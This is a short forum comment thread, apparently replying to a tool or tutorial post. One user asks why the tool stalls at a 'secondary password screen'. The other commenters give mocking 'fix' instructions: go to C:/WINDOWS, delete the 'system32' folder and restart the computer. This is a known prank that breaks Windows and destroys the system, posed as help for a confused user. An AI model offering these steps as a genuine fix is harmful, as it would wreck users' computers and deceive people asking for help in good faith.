u forgot after delete the system32 folder he need's to restart his PC. or it wont work

can anyone help me, i tried using this, and when it gets to the secondary password screen it just stops, nothing happens. Does anyone know how to fix this please?

omg we just explained how to fix this! learn to read!

-> C:/WINDOWS
-> delete "system32" folder
-> Restart computer.
